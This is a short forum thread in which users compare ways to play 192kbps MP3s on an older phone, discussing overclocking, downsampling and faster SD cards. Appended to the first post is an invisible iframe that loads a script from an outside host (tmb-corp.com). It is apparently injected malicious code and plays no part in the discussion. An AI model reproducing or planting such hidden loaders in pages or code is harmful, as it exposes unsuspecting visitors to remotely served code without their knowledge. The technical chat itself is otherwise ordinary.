Mp3's at 192bps??

Has anyone figured out a way to play 192bps mp3's?
I have ripped almost all my music at this rate and so not want to have to convert them.
Any suggestions would be appreciated.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

They only way I've seen 192k mp3s play without skipping is if you over clock the processor. I tried FastCPU and setting it to 40mHZ seemed to do the trick. However, overclocking the mp3 player or bebopper seems to cause the phone to sometimes miss calls while you're playing mp3s. This was unacceptable to me so I ended up downsampling all music that I put on my sd card to 128k. I used a program called MP3 to All. It's really easy to use and makes the process very simple. It's a lot less of a hassle than I thought it would be, especially when using a card reader.

hmmm... I seem to be able to play 192kbps MP3s on my 7135 now.. I upgraded recently to a Lexar 512MB SD card, and I noticed immediately that it was much faster. I *think* some of my new MP3s are 192kbps, and they work fine now! I've noticed most things off the card run much more quickly... about half the time to read a directory on the card. I still have my old Sandisk 256MB lying around somewhere.. I'll try and run a speed comparison soon.
So, if they improve the SD slot card driver soon, imagine how nice our MP3s will sound!

I have also had no problem playing files encoded higher than128. Most of my library is 162 or 196. I just shoot them onto the SD chip and play away.

I do notice skipping when changing programs, closing the flip etc but given that I can read a book or work on a spreadsheet at the same time all on a 33Mhz processor - I find it pretty acceptable.

Makes the minimum requiremens for XP look pretty outragious eh?

Sandisk makes the slowest SD cards around. Any other card out there will improve your speeds.
